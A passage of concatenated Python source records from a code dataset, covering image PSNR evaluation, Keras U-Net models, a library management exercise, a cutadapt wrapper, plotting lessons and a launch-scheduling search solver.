os.path.split(reconImgFullPath)[1].split('.')[0]\n redict[reconImgName] = reconImgFullPath\n '''\n b.append(os.path.split(reconImgFullPath)[1])\n reconImg = Image.open(reconImgFullPath)\n reconImgList.append(reconImg)\n '''\n '''\n print(\"ori:\", a)\n print(\"re:\", b)\n '''\n PSNR_dict = {}\n totalPSNR = 0\n #for i in range(len(oriImgList)):\n for i in oridict:\n #print(i)\n oriImg = Image.open(oridict[i])\n reImg = Image.open(redict[i])\n somePSNR = sR.calc_PSNR(generate_img=reImg, original_img=oriImg)\n #somePSNR = sR.calc_PSNR(generate_img=reconImgList[i], original_img=oriImgList[i])\n #PSNR_dict[os.path.split(oriImgFullPaths[i])[1]] = somePSNR\n PSNR_dict[i] = somePSNR\n totalPSNR += somePSNR\n #meanPSNR = totalPSNR/len(oriImgList)\n meanPSNR = totalPSNR / len(oridict)\n print(\"PSNR of each pair:\", PSNR_dict)\n print(\"meanPSNR:\", meanPSNR)\n #print(\"without flinstone, meanPSNR:\", (totalPSNR-PSNR_dict['flinstones'])/(len(oridict)-1))\n return\n\nif __name__ == '__main__':\n #Decnn = De1.De_ops(init_op=False)\n #save_reconImg_from_nn(nn=Decnn)\n\n oriImgDir = './Training_Data_L/test_images/noiseless/'\n reconImgDir = './Training_Data_L/re_test_images/noiseless/v1/mr_0_01_e1000/'\n print(reconImgDir)\n cal_each_mean_PSNR(oriImgDir=oriImgDir, reconImgDir=reconImgDir)\n\n #文件夹中图片放到标准尺寸背景中\n # dir1 = './Training_Data_L/reconTrain/'\n # dir2 = './Training_Data_L/reconTrainSTS/'\n # tdp.paste_entireImg_to_standardSizeImg(imgDirPath=dir1, saveDirPath=dir2)","sub_path":"DeCNN/save_recon_Image.py","file_name":"save_recon_Image.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"52415501","text":"SLEEP = set([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\r\n\r\ndef get_soln(in_num):\r\n if in_num == 0:\r\n return 'INSOMNIA'\r\n else:\r\n seen = set()\r\n num = in_num\r\n x = 2\r\n while True:\r\n seen.update(map(int, str(num)))\r\n if seen == SLEEP:\r\n break\r\n else:\r\n num = in_num * x\r\n x += 1\r\n\r\n return num\r\n\r\n\r\nnum_problems = int(input())\r\nfor i in range(num_problems):\r\n num = int(input())\r\n soln = get_soln(num)\r\n print('Case #{}: {}'.format(i + 1, soln))","sub_path":"codes/CodeJamCrawler/16_0_1/JProkop/sleep.py","file_name":"sleep.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"548519142","text":"# Vendor,Category, Item, Price, Origin,Destination, Rating, Remarks\n# cyberzen,Services/Other,Insider's Forex Trading Signals (Make Thousands of $$$'s DAILY from my 20 yr Daytrader),2.569571838605444 BTC,,,4.89/5,Average price may be skewed outliar > .5 BTC found\n\ndef create_dataset(file):\n\n dataset = dict()\n\n with open(file, 'r', encoding=\"utf8\") as f:\n file_line = f.readline()\n\n if not file_line:\n return dataset\n\n main_header = file_line.rstrip().split(\",\")\n\n file_line = f.readline()\n while file_line:\n\n [Vendor, Category, Item, Price, Rating,] = [element.strip() for element in file_line.rstrip().split(\",\")]\n\n if Vendor not in dataset:\n dataset[Vendor] = dict()\n\n if Category not in dataset[Vendor]:\n dataset[Vendor][Category] = dict()\n\n dataset[Vendor][Category].update({\n Item: {\n 'Price': Price,\n 'Rating': Rating,\n\n }\n })\n\n file_line = f.readline()\n\n return dataset\nprint(create_dataset('Agora.csv'))","sub_path":"km-84/Misak_Yuri/workshop6/homework/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"536374698","text":"import numpy as np\nimport keras\nimport tensorflow as tf\n\nfrom keras import models, backend, Model\nfrom keras.layers import Input, Conv2D, MaxPool2D, ZeroPadding2D, MaxPooling2D, Conv2DTranspose\nfrom keras.layers import BatchNormalization, Flatten, Dense, Reshape, concatenate\n\n'''\n 1000fps simple-seg net 모델\n simple-seg-net ACC : 62.70% (논문 상)\n'''\ndef get_1000fps_model(input_size,filters=64):\n input_shape = (*input_size,3)\n x = Input(input_shape,name=\"input\")\n #First Convolution Block\n block_name = \"conv1-\"\n inode = ZeroPadding2D(padding=(2,2),name=block_name+\"padding\")(x)\n inode = Conv2D(filters, (5,5), strides=(1,1), activation='relu',name=block_name+\"conv\")(inode)\n inode = MaxPool2D(pool_size=(3,3),strides=2,name=block_name+\"pool\")(inode)\n inode = BatchNormalization(name=block_name+\"batchnorm\")(inode)\n\n #Second Convolution Block\n block_name = \"conv2-\"\n inode = ZeroPadding2D(padding=(2,2),name=block_name+\"padding\")(inode)\n inode = Conv2D(filters, (5,5), strides=(1,1), activation='relu',name=block_name+\"conv\")(inode)\n inode = MaxPool2D(pool_size=(3,3),strides=2,name=block_name+\"pool\")(inode)\n inode = BatchNormalization(name=block_name+\"batchnorm\")(inode)\n\n #Third Convolution Block\n block_name = \"conv3-\"\n inode = Conv2D(filters, (3,3), strides=(1,1), activation='relu',name=block_name+\"conv\")(inode)\n\n #First FC layer\n block_name = \"fc1\"\n inode = Flatten(name='flatten')(inode)\n inode = Dense(100, activation='relu',name=block_name)(inode)\n\n #Second FC layer\n block_name = \"fc2\"\n inode = Dense(400, activation='relu',name=block_name)(inode)\n\n #output layer\n block_name = \"out-\"\n inode = Dense(input_size[0]*input_size[1], activation='sigmoid',name=block_name+\"fc\")(inode)\n\n y = Reshape(input_size,name=block_name+'reshape')(inode)\n return Model(x,y)\n\n'''\n U-NET Architecture\n 목표 ACC : 80%\n -> Dense-Net으로 바꾸면서 좀더 높은 ACC 기대\n'''\ndef unet_convBlock(x, filters, block_name,zero_padding=False):\n if zero_padding:\n x = ZeroPadding2D(padding=(1,1))(x)\n conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv1\") (x)\n else:\n conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv1\") (x)\n \n if zero_padding:\n conv = ZeroPadding2D(padding=(1,1))(conv)\n conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv2\") (conv)\n else:\n conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv2\") (conv)\n \n out = MaxPooling2D((2, 2), name=block_name+\"pool\") (conv)\n return conv, out\n\ndef unet_upconvBlock(x, connect_layer, filters, block_name,zero_padding=False):\n upconv = Conv2DTranspose(filters, (2, 2), strides=(2, 2), padding='same', name=block_name+\"upconv1\") (x)\n concat = concatenate([upconv, connect_layer], axis=3, name=block_name+\"concat\")\n if zero_padding:\n conv = ZeroPadding2D(padding=(1,1))(concat)\n conv = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv1\") (conv)\n else:\n conv = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv1\") (concat) \n \n if zero_padding:\n conv = ZeroPadding2D(padding=(1,1))(conv)\n out = Conv2D(filters, (3, 3), activation='relu', padding=\"valid\", name=block_name+\"conv2\") (conv)\n else:\n out = Conv2D(filters, (3, 3), activation='relu', padding='same', name=block_name+\"conv2\") (conv)\n return out\n\ndef get_basic_unet_model(input_size, depth =4, filters=8, zero_padding=False):\n input_shape = (*input_size,3)\n x = Input(input_shape,name=\"input\")\n\n # Down part\n p = None\n convs = []\n for i in range(depth):\n if p is None:\n c, p = unet_convBlock(x, filters, block_name=\"conv{}-\".format(i))\n else:\n c, p = unet_convBlock(p, filters, block_name=\"conv{}-\".format(i))\n convs.append(c)\n filters*=2\n\n # Bottom part\n if zero_padding:\n p = ZeroPadding2D(padding=(1,1))(p)\n p = Conv2D(filters, (3, 3), activation='relu', padding='valid', name='mid-1') (p)\n else:\n p = Conv2D(filters, (3, 3), activation='relu', padding='same', name='mid-1') (p)\n\n if zero_padding:\n p = ZeroPadding2D(padding=(1,1))(p)\n p = Conv2D(filters, (3, 3), activation='relu', padding='valid', name='mid-2') (p)\n else:\n p = Conv2D(filters, (3, 3), activation='relu', padding='same', name='mid-2') (p)\n\n # Up part\n for i in range(depth-1,-1,-1):\n filters //= 2\n if i == depth-1:\n c = unet_upconvBlock(p, convs[i], filters, block_name=\"upconv{}-\".format(i))\n else:\n c = unet_upconvBlock(c, convs[i], filters, block_name=\"upconv{}-\".format(i))\n\n c = Conv2D(1, (1, 1), activation='sigmoid') (c)\n y = Reshape(input_size)(c)\n\n model = Model(inputs=x, outputs=y)\n return model","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"509902588","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Filename: LibraryManagement.py\n# @Author: Yalu\n# @Time: 2/10/2018 8:34 PM\n\"\"\"\nA program that allows to borrow and return books from a library.\nSuppose that the library cannot own more than one copy of each book.\nA list of books will be stored in a file “exercise 8.dat” that will automatically be read at the start of the program.\nDuplicate books are not allowed in the file, and each book is assigned a unique ID (a positive integer).\nEvery book is available at the start of the program.\nThe program allows the following operations:\n• “display” displays for each book in the collection displays the title, their ID, as well as their availability,\n• “check ID” checks the availability of a book given its ID,\n• “borrow ID” marks the book with that ID as borrowed,\n• “return ID” Return a book with that ID.\nFinally, the commands should display appropriate error messages when:\n• trying to borrow or return a book with an invalid ID (i.e. it does not belong to the collection),\n• trying to borrow a book that is not available (i.e. it has been borrowed already),\n• trying to return a book that has not been borrowed.\n\"\"\"\n\n\nclass Book:\n def __init__(self, title, number):\n self.name = title\n self.id = number\n self.availability = True\n\n def get_name(self):\n return self.name\n\n def get_id(self):\n return self.id\n\n def get_availability(self):\n return self.availability\n\n def set_name(self, new_name):\n self.name = new_name\n\n def set_id(self, new_id):\n self.id = new_id\n\n def set_availability(self, new_status):\n self.availability = new_status\n\n def display(self):\n print('Title:', self.name, '\\nID:', self.id, '\\nAvailability:', self.availability, '\\n')\n\n\nclass Library:\n def __init__(self):\n self.books = []\n self.book_count = 0\n self.load_books()\n\n def load_books(self):\n # Use a string instead just because I don't want to make that .bat file.\n # Anyways, I know they both work.\n # If you want to read from the file, uncomment line 272-274, comment line 275-283,\n # and make the 'exercise_8.dat' file to store the string content in one line.\n\n # f = open('exercise_8.dat', 'r')\n # book_list = f.readline().split(' - ')\n # f.close()\n book_list = \"In Search of Lost Time - \" \\\n \"Alice's Adventures in Wonderland - \" \\\n \"East of Eden - \" \\\n \"The Odyssey - \" \\\n \"Twenty Thousand Leagues Under the Sea - \" \\\n \"Man’s Fate - The Picture of Dorian Gray - \" \\\n \"Adventures of Huckleberry Finn - \" \\\n \"Nineteen Eighty Four - \" \\\n \"Reveries of a Solitary Walker\".split(' - ')\n for book in book_list:\n self.book_count += 1\n self.books.append(Book(book, self.book_count))\n\n def display(self):\n for book in self.books:\n book.display()\n\n def check_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for book in self.books:\n if book.get_id() == book_id:\n print(book.get_availability())\n else:\n print('Invalid ID')\n\n def borrow_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for book in self.books:\n if book.get_id() == book_id:\n if book.get_availability():\n book.set_availability(False)\n else:\n print(book.get_name(), 'is not available.')\n break\n else:\n print('Invalid ID')\n\n def return_id(self, book_id):\n if 0 < book_id <= self.book_count:\n for book in self.books:\n if book.get_id() == book_id:\n if not book.get_availability():\n book.set_availability(True)\n else:\n print(book.get_name(), 'is not borrowed.')\n break\n else:\n print('Invalid ID')\n\n\nif __name__ == '__main__':\n lib = Library()\n lib.display()\n lib.check_id(0)\n lib.check_id(11)\n lib.return_id(0)\n lib.return_id(11)\n lib.borrow_id(0)\n lib.borrow_id(11)\n lib.return_id(2)\n lib.borrow_id(2)\n lib.borrow_id(2)\n lib.display()\n","sub_path":"rubish/LibraryManagement.py","file_name":"LibraryManagement.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"577310709","text":"from sys import stdin\nfrom collections import deque\n\nclass TreeNode:\n def __init__(self, value):\n self.left = None\n self.right = None\n self.data = value\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def addNode(self, node, value):\n if(node==None):\n self.root = TreeNode(value)\n else:\n if(valuenode.data):\n if(node.right==None):\n node.right = TreeNode(value)\n else:\n self.addNode(node.right, value)\n else:\n return\n\n def getHeight(self, node):\n if node == None:\n return 0\n lNode = self.getHeight(node.left)\n rNode = self.getHeight(node.right)\n return max(lNode, rNode) + 1\n \nf = deque()\ntree = Tree()\n\nwhile True:\n a = [int(x) for x in stdin.readline().split()]\n if a[0] == 0:\n f.appendleft(a[1])\n elif a[0] == 1:\n f.append(a[1])\n elif a[0] == 2:\n try:\n i = f.index(a[1])\n f.insert(i + 1,(a[2]))\n except:\n f.appendleft(a[2])\n else:\n for i in f:\n tree.addNode(tree.root, i)\n print(tree.getHeight(tree.root))\n exit()","sub_path":"Wecode/19520214/Week 3.1/Problem_3.py","file_name":"Problem_3.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"397655911","text":"import os\nimport shutil\n\nfrom wmt.config import site\nfrom wmt.models.submissions import prepend_to_path\nfrom wmt.utils.hook import find_simulation_input_file\nfrom topoflow_utils.hook import choices_map\n\n\nfile_list = ['rti_file',\n\t 'DEM_file',\n 'H0_file',\n 'pixel_file']\n\n\ndef execute(env):\n \"\"\"Perform pre-stage tasks for running a component.\n\n Parameters\n ----------\n env : dict\n A dict of component parameter values from WMT.\n\n \"\"\"\n env['n_steps'] = int(round(float(env['run_duration']) / float(env['dt'])))\n env['save_grid_dt'] = float(env['dt'])\n env['save_pixels_dt'] = float(env['dt'])\n\n # TopoFlow needs site_prefix and case_prefix.\n env['site_prefix'] = os.path.splitext(env['rti_file'])[0] \n env['case_prefix'] = 'WMT'\n\n # If no pixel_file is given, let TopoFlow make one.\n if env['pixel_file'] == 'off':\n file_list.remove('pixel_file')\n env['pixel_file'] = env['case_prefix'] + '_outlets.txt'\n\n if env['H0_file'] == 'off':\n file_list.remove('H0_file')\n env['H0_file'] = 'None'\n\n env['VARIABLE_DT_TOGGLE'] = choices_map[env['VARIABLE_DT_TOGGLE']]\n env['INIT_COND_TOGGLE'] = choices_map[env['INIT_COND_TOGGLE']]\n env['GENERIC_ICE_TOGGLE'] = choices_map[env['GENERIC_ICE_TOGGLE']]\n env['ICEFLOW_TOGGLE'] = choices_map[env['ICEFLOW_TOGGLE']]\n env['ICESLIDE_TOGGLE'] = choices_map[env['ICESLIDE_TOGGLE']]\n env['FREEZE_ON_TOGGLE'] = choices_map[env['FREEZE_ON_TOGGLE']]\n\n # Default files common to all TopoFlow components are stored with the\n # topoflow component metadata.\n prepend_to_path('WMT_INPUT_FILE_PATH',\n os.path.join(site['db'], 'components', 'topoflow', 'files'))\n for fname in file_list:\n src = find_simulation_input_file(env[fname])\n shutil.copy(src, os.curdir)\n","sub_path":"ice_gc2d/hooks/pre-stage.py","file_name":"pre-stage.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629965703","text":"import os,subprocess\nfrom igf_data.utils.fileutils import check_file_path,get_temp_dir\nfrom igf_data.utils.singularity_run_wrapper import execute_singuarity_cmd\n\ndef run_cutadapt(\n read1_fastq_in, read1_fastq_out, read2_fastq_in=None, read2_fastq_out=None, dry_run=False,\n cutadapt_exe='cutadapt', singularity_image_path=None, cutadapt_options=('--cores=1',)):\n try:\n check_file_path(read1_fastq_in)\n if read2_fastq_in is not None:\n check_file_path(read2_fastq_in)\n if singularity_image_path is not None:\n check_file_path(singularity_image_path)\n cmd = [cutadapt_exe]\n if isinstance(cutadapt_options,tuple):\n cutadapt_options = list(cutadapt_options)\n if cutadapt_options is not None and \\\n len(cutadapt_options) > 0:\n cmd.\\\n extend(cutadapt_options)\n if read2_fastq_in is not None:\n if read2_fastq_out is None:\n raise ValueError(\n 'Missing R2 output file for input {0}'.\\\n format(read2_fastq_in))\n cmd.\\\n append('-p {0}'.format(read2_fastq_out))\n cmd.\\\n extend([\n '-o {0}'.format(read1_fastq_out),\n read1_fastq_in])\n if read2_fastq_in is not None:\n cmd.\\\n append(read2_fastq_in)\n cmd = \\\n ' '.join(cmd)\n if dry_run:\n return cmd\n if singularity_image_path is not None:\n check_file_path(singularity_image_path)\n log_dir = get_temp_dir(use_ephemeral_space=True)\n bind_dir_list = [\n os.path.dirname(read1_fastq_out),\n os.path.dirname(read1_fastq_in)]\n if read2_fastq_in is not None:\n bind_dir_list.\\\n extend([\n os.path.dirname(read2_fastq_in),\n os.path.dirname(read2_fastq_out)])\n bind_dir_list = \\\n list(set(bind_dir_list))\n execute_singuarity_cmd(\n image_path=singularity_image_path,\n command_string=cmd,\n log_dir=log_dir,\n task_id='cutadapt',\n bind_dir_list=bind_dir_list)\n else:\n subprocess.check_call(cmd,shell=True)\n return cmd\n except Exception as e:\n raise ValueError(\n 'Failed to run cutadapt, error: {0}'.\\\n format(e))","sub_path":"igf_data/utils/tools/cutadapt_utils.py","file_name":"cutadapt_utils.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482671949","text":"# Lessons 23-24\nimport numpy as np\nimport scipy.stats\nimport bootcamp_utils\n\n# Plotting tool\nimport matplotlib.pyplot as plt\n\n# Plot options in seaborn\nimport seaborn as sns\nrc = {'lines.linewidth': 4, 'axes.labelsize': 25,\n 'axes.titlesize': 30, 'lines.markersize': 20,\n 'legend.fontsize': 20}\nsns.set(rc=rc)\n\ndata_txt = np.loadtxt('data/collins_switch.csv', delimiter=',', skiprows=2)\n\n# Slice out data\niptg = data_txt[:,0]\ngfp = data_txt[:,1]\n\n# Slice out stanard error\nsem = data_txt[:,2]\n\n\n# plot the data\n# plt.semilogx(iptg, gfp, linestyle='none', marker='.')\nplt.errorbar(iptg, gfp, yerr=sem, linestyle='none',\n marker='.')\n\n# Axes and Title\nplt.xlabel('IPTG Concentration (mM)')\nplt.ylabel('Normalized GFP')\nplt.xscale('symlog')\n\nplt.title('IPTG titration')\n\n# margins\nplt.margins(0.2)\n\nplt.show()\nplt.close()\n\n# Plot CDFs (instead of histograms)\n\n# Load the food data. (no need to specify delimiter)\nxa_high = np.loadtxt('data/xa_high_food.csv', comments='#')\nxa_low = np.loadtxt('data/xa_low_food.csv', comments='#')\n\n# Compute ECDF\nx_high, ecdf_high = bootcamp_utils.ecdf(xa_high)\nx_low, ecdf_low = bootcamp_utils.ecdf(xa_low)\n\n# Plot the ecdf\nplt.plot(x_high, ecdf_high, marker='.', linestyle='none',\n alpha=0.5)\nplt.plot(x_low, ecdf_low, marker='.', linestyle='none',\n alpha = 0.5)\n\n# Axes and title\nplt.xlabel('Crossectional area ($\\mu m ^2$)')\nplt.ylabel('ECDF')\n\nplt.legend(('high concentration', 'low concentration'), loc='lower right')\nplt.margins(0.05)\n\n# Exercise 5\n\n# Find ranges of data# Find range for bin boundaries\nglobal_min = np.min(np.concatenate((xa_low, xa_high)))\nglobal_max = np.max(np.concatenate((xa_low, xa_high)))\n\n# Generate points to plot normal CDFs\nx = np.linspace(global_min-50, global_max+50, 400)\n\nnorm_cdf_high = scipy.stats.norm.cdf(x, loc=np.mean(xa_high),\n scale=np.std(xa_high))\n\nnorm_cdf_low = scipy.stats.norm.cdf(x, loc=np.mean(xa_low),\n scale=np.std(xa_low))\n\nplt.plot(x, norm_cdf_high, '-k')\nplt.plot(x, norm_cdf_low, '-k')\n\nplt.show()\n","sub_path":"l23_24.py","file_name":"l23_24.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315433053","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import date\n\n'''\nFUNCTIONS (auxiliar) - simplify problem \n'''\n\ndef check_launchable(comp_list, launch):\n total_weight=0\n for comp in comp_list:\n total_weight+=comp.w\n if total_weight>launch.pl:\n return False\n elif total_weight== launch.pl:\n return -1\n else:\n return True\n \ndef launch_cost(comp_list,launch):\n total_cost=0\n for comp in comp_list:\n total_cost+=comp.w*launch.costv\n if total_cost !=0:\n total_cost+=launch.costf\n return total_cost\n\ndef check_list(state, node_list):\n for node in node_list:\n if sorted(node.state.comp, key=lambda x: x.id) == sorted(state.comp, key=lambda x: x.id) and node.state.l==state.l: #they have the same comp\n return node\n return False\n \ndef solution(path, cost=0, i=0):\n if path == False:\n \n print('\\t There is no solution for the given problem.')\n return\n else:\n for launch in path:\n if launch[1] == []: # no component sent\n continue\n print('At launch: ',launch[0],'\\t send: ', launch[1])\n print('\\t Total launch cost:',cost,'\\t iteration:',i)\n\n\n'''\nCLASSES (auxiliar) - read from file\n component, edge, launch\n'''\n\nclass MyComponent:\n def __init__(self,id1='none',w=0):\n self.id = id1\n self.w = float(w)\n def __repr__(self):\n return 'Comp:{}({})'.format(self.id, self.w)\n def view(self):\n print('{}: ID={}, Weight={}'.format(self.__class__.__name__, self.id, self.w))\n \nclass MyConnect:\n def __init__(self,id1='none',id2='none'):\n self.id1 = id1\n self.id2 = id2 \n def __repr__(self):\n return 'Con:{}-{}'.format(self.id1,self.id2)\n def view(self):\n print('{}: ID1={}, ID2={}'.format(self.__class__.__name__, self.id1, self.id2))\n \nclass MyLaunch:\n def __init__(self,datee='310122000', payload=0, CostFixed=0, CostVar=0):\n self.date=date(year=int(datee[4:8]), month=int(datee[2:4]), day=int(datee[0:2]))\n self.pl=float(payload)\n self.costf=float(CostFixed)\n self.costv=float(CostVar)\n def __repr__(self):\n return 'Lau:{}[{}] ({}+{})'.format(self.date, self.pl, self.costf, self.costv)\n def view(self):\n print('{}: Date={}, Payload={}, Costs=(Fix={}, Var={})'.format(\n self.__class__.__name__,self.date,self.pl,self.costf,self.costv))\n def __eq__(self, other):\n if not bool(self) and not bool(other): # if both launches are set as false\n return True\n elif not bool(self) or not bool(other): #if only one launch is false\n return False\n else:\n return self.date==other.date\n \n'''\nCLASSES (main) - necessary for general search\n state, node, problem\n'''\n\nclass MyState:\n def __init__(self,lcomp=[],nlaun=[]):\n '''components in space + next launch'''\n self.comp=lcomp\n self.l=nlaun\n def __repr__(self):\n return 'Stt:{}({})'.format(self.comp, self.l)\n def view(self):\n print('{}: Comp={}, Launch={}'.format(self.__class__.__name__, self.comp, self.l))\n\n def __eq__(self, other):\n return self.comp==other.comp and self.l==other.l\n\nclass MyNode:\n def __init__(self,state=MyState(),g=0,path=[],h=0):\n self.state=state\n self.path=path\n self.cost=g\n self.heur=h\n self.f=g+h\n \n def __repr__(self):\n return '{}: State={}, Cost={}, Path={}, f={}'.format(self.__class__.__name__,\n self.state, self.cost,self.path,self.f)\n def __lt__(self, other): \n return self.f < other.f #order nodes by value of f function\n \nclass MyProblem:\n def __init__(self,Components=[],Edges=[],Launches=[],GoalState=[],InitialState=[]):\n self.InitialState=InitialState\n self.GoalState=GoalState\n self.CompL=Components\n self.EdgeL=Edges\n self.LaunL=Launches\n \n def __repr__(self):\n return '{}:\\n Components... {}\\n Edges... {}\\n Launches... {}\\n InitialState={}\\n GoalState={}\\n'.format(self.__class__.__name__,\n self.CompL, self.EdgeL, self.LaunL, self.InitialState, self.GoalState) \n \n def goaltest(self,state):\n if self.GoalState.comp==state.comp: #states must be sorted\n return True\n else:\n return False\n \n # Reads information from file and stores in problem lists\n def read_file(self, txt): \n file = open(txt,'r') # Opens the .txt file with all the information\n l1 = file.readlines() # Reads all lines from file to a list, one line per entry\n V_list = list() # Initiallize empty lists\n E_list = list() # Initiallize empty lists\n L_list = list() # Initiallize empty lists\n \n for n in l1: # Groups the elements of l1 into 3 categories: V, E and L\n s1 = str(n)\n aux = s1.split()\n if(s1[0]=='V'):\n V_list.append(MyComponent(aux[0],aux[1]))\n elif(s1[0]=='E'):\n E_list.append(MyConnect(aux[1],aux[2]))\n elif(s1[0]=='L'):\n L_list.append(MyLaunch(aux[1],aux[2],aux[3],aux[4]))\n L_list.sort(key=lambda x: x.date)\n \n self.CompL=V_list\n self.EdgeL=E_list\n self.LaunL=L_list\n \n # Receives one component and returns a list of components directly conected to it\n def adjacent(self, comp):\n adj_list=[] # list with adjacent components (to be returned)\n if comp==[]: # no componnets in space\n for comp in self.CompL:\n adj_list.append(comp)\n return adj_list\n for edge in self.EdgeL:\n if comp.id==edge.id1: # check if component is on this edge\n aux=edge.id2\n elif comp.id==edge.id2:\n aux=edge.id1\n else: continue\n for comp_adj in self.CompL: # identidy conected component in component list\n if aux==comp_adj.id:\n break\n adj_list.append(comp_adj)\n return adj_list\n \n # Recieves the current state and returns all possible actions (respecting problem constrains)\n def action_func(self, state):\n if not state.l[0]: # if there are no more launches\n return []\n actions=[[]] # send nothing is always an option\n act_imp = list() # Initiallize empty lists\n act_unk = list()\n act_aux = list()\n if state.comp != []: # if we have components in space we should mark them as impossible to re-launch\n for comp_x in state.comp:\n act_imp.append([comp_x])\n \n if state.comp==[]: # calculate adjacent components when nothing is in space\n act_aux=self.adjacent(state.comp)\n else: # calculate adjacent components to each component already in space\n for comp in state.comp:\n act_aux+=self.adjacent(comp)\n \n for action in act_aux: # save each adjacent component as a list of one component\n act_unk.append([action])\n \n while act_unk!=[]: # do until all possible possible actions are explored\n action = act_unk.pop(0)\n mask=[set(action).issuperset(aa) for aa in act_imp]\n if True in mask: # if action contains a group of imp components, do nothing\n pass\n elif not check_launchable(action,state.l[0]): # if action is too heavy for launch add to impossible list\n act_imp.append(action)\n else: # if action is possible add to actions list and add adjacent nodes to actions unknown\n actions.append(action)\n for comp in action+state.comp: # calculate adjacent components for all components to be launched AND already in space\n sub_act = self.adjacent(comp)\n for sub in sub_act:\n if not sub in action: # if adjacent isn't already set to be launched \n action_sub=action+[sub]\n mask=[sorted(action_sub, key=lambda x: x.id) == sorted(aa, key=lambda x: x.id) for aa in actions+act_unk]\n if not True in mask: # check if the same group of components was already set to be launched before (in another order)\n act_unk.append(action_sub)\n return actions\n \n # Recieves the current state and estimates consistent value to achieve goal\n def heuristic(self, state):\n heur_cost=0 # variable to be returned \n\n remain_comp = [item for item in self.CompL if item not in state.comp] # list of components still to be launched\n remain_w = sum(comp.w for comp in remain_comp) # total weight of all components to be launched \n \n if state.l[0]==False: # if there are no more launches remaining\n if remain_comp == []:\n return 0\n else:\n return 1995 # act as a flag to be sent when it is impossible to achieve goal\n \n mask=[state.l[0]==launch for launch in self.LaunL] # compare launch with launch list and flag index\n remain_laun=self.LaunL[mask.index(True):] # create list with remaining launcehs\n \n if remain_w > sum(l.pl for l in remain_laun): # if there is more weight to be launched than total available payload\n return 1995\n \n min_cost_list = sorted(remain_laun, key= lambda x: (x.costf+(x.costv*x.pl))/x.pl) # order by specific cost (total cost per weight)\n \n while remain_w > 0:\n launch=min_cost_list.pop(0)\n sp_cost = (launch.costf+(launch.costv*launch.pl))/launch.pl # specific cost\n if remain_w <= launch.pl: # if all components can be send in this launch\n heur_cost += sp_cost*remain_w\n remain_w = 0\n else:\n heur_cost += sp_cost*launch.pl\n remain_w -= launch.pl # subtract launched payload from total weight to be launcehd\n return heur_cost\n \n # unused alternative heuristic\n def heuristic2(self, state):\n heur_cost=0 # variable to be returned \n \n remain_comp = [item for item in self.CompL if item not in state.comp] # list of components still to be launched\n remain_w = sum(comp.w for comp in remain_comp) # total weight of all components to be launched \n \n if state.l[0]==False: # if there are no more launches remaining\n if remain_comp == []:\n return 0\n else:\n return 1995 # define a flag to be sent when it is impossible to achieve goal\n \n mask=[state.l[0]==launch for launch in self.LaunL] # compare launch with launch list and flag index\n remain_laun=self.LaunL[mask.index(True):]\n \n if remain_w > sum(l.pl for l in remain_laun): # if there is more weight to be launched than total available payload\n return 1995\n \n min_costv_list = sorted(remain_laun, key= lambda x: x.costv) # order remaining launches by variable cost\n min_costf_list = sorted(remain_laun, key= lambda x: x.costf/x.pl) # order by fixed cost per weight\n \n aux_w = remain_w\n while remain_w > 0:\n launchV = min_costv_list.pop(0) # pop launch with lowest variable cost\n if remain_w <= launchV.pl: # if all components can be send in this launch\n heur_cost += remain_w*launchV.costv # variable cost of sending remaining comp\n remain_w = 0\n else:\n heur_cost += launchV.pl*launchV.costv # variable cost of sending maximung payload\n remain_w -= launchV.pl # subtract launched payload from total weight to be launcehd\n \n remain_w=aux_w\n while remain_w > 0:\n launchF = min_costf_list.pop(0) # pop launch with lowest fix cost\n if remain_w <= launchF.pl: # if all components can be send in this launch\n heur_cost += remain_w/launchF.pl*launchF.costf\n remain_w = 0\n else:\n heur_cost += launchF.costf # fix cost of using one launch\n remain_w -= launchF.pl\n return heur_cost\n \n # Receives a node, a action and a search method and computes the child node\n def childnode(self,node,action,search):\n nextstateC = node.state.comp + action # next state comp = comp already in space + comp launched\n nextstateC.sort(key= lambda x: x.id) # always store state with sorted components\n mask=[node.state.l[0]==launch for launch in self.LaunL]\n if mask[-1]: # if next launch is the last define next launch as False\n nextstateL=[False]\n else: # if there are more launches set next launch as the next in time\n nextstateL=[self.LaunL[mask.index(True)+1]]\n nextState = MyState(nextstateC,nextstateL)\n nextpath = node.path+[[node.state.l[0],action]] # update path with launch used and what was sent\n nextcost = node.cost + launch_cost(action,node.state.l[0])\n if search == '-i':\n next_h = self.heuristic(nextState)\n elif search == '-i2':\n next_h = self.heuristic2(nextState)\n else:\n next_h = 0\n NextNode = 